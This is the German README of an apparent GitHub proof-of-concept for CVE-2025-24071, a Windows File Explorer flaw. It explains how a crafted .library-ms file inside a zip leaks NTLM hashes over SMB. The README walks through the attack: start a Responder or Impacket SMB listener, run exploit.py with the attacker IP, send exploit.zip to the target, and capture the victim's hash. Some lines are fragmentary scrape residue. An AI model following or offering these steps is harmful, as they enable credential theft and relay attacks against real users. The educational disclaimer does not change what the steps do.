
Dies ist ein Python-PoC-Skript für CVE-2025-24071, eine Schwachstelle in Windows File Explorer, die unbefugten Zugriff auf vertrauliche Informationen wie NTLM-Exposition ermöglicht.
CVE-2025-24071 ist eine Sicherheitslücke im Windows Datei-Explorer, die die unbefugte Offenlegung von NTLM-Hashes ermöglicht. Wenn ein Benutzer ein speziell präpariertes .zip-Archiv extrahiert, das eine schädliche .library-ms-Datei enthält, analysiert der Windows Explorer die Datei automatisch und initiiert eine SMB-Authentifizierungsanforderung an einen vom Angreifer kontrollierten Server, wodurch der NTLM-Hash des Opfers ohne weitere Benutzerinteraktion preisgegeben wird.
.library-ms-Datei, die auf seinen SMB-Server verweist..zip-Archiv..library-ms-Datei.https://github.com/user-attachments/assets/e71ea7f7-c739-46f1-9e91-1f3b13b21596
Hinweis: Wenn das Video nicht inline abgespielt wird, laden Sie
PoC.mp4aus diesem Repository herunter.
smbserver.py)Repository klonen
git clone https://github.com/yourusername/CVE-2025-24071.git
cd CVE-2025-24071
Starten Sie Ihren SMB-Listener (auf dem Angreifer-Rechner)
# Using Responder
sudo responder -I eth0
# Or using Impacket
sudo python3 smbserver.py -smb2support fakeShare /tmp/share
Exploit generieren
python exploit.py
Geben Sie Ihre Angreifer-IP ein wenn Sie dazu aufgefordert werden
Senden Sie exploit.zip an das Ziel
NTLM-Hash erfassen wenn das Opfer das Archiv extrahiert
CVE-2025-24071/
├── exploit.py # PoC exploit generator
├── PoC.mp4 # Video demonstration
└── README.md # Documentation
Dieses Tool wird ausschließlich für Bildungszwecke und autorisierte Sicherheitstests bereitgestellt. Unbefugter Zugriff auf Computersysteme ist illegal. Der Autor übernimmt keine Verantwortung für Missbrauch oder Schäden, die durch dieses Tool verursacht werden.
Nyx0r-PoC
Dieses Projekt dient ausschließlich Bildungszwecken. Verwenden Sie es verantwortungsvoll.
⭐ Markieren Sie dieses Repository mit einem Stern, wenn Sie es nützlich fanden!
| Eigenschaft | Wert |
|---|
| CVE-ID | CVE-2025-24071 |
| Typ | NTLM-Hash-Offenlegung / Informationsleck |
| Angriffsvektor | Lokal (erfordert, dass der Benutzer ZIP extrahiert) |
| Benutzerinteraktion | Minimal (nur Archiv extrahieren) |
| Auswirkung | NTLM-Anmeldeinformationsdiebstahl, mögliche Relay-Angriffe |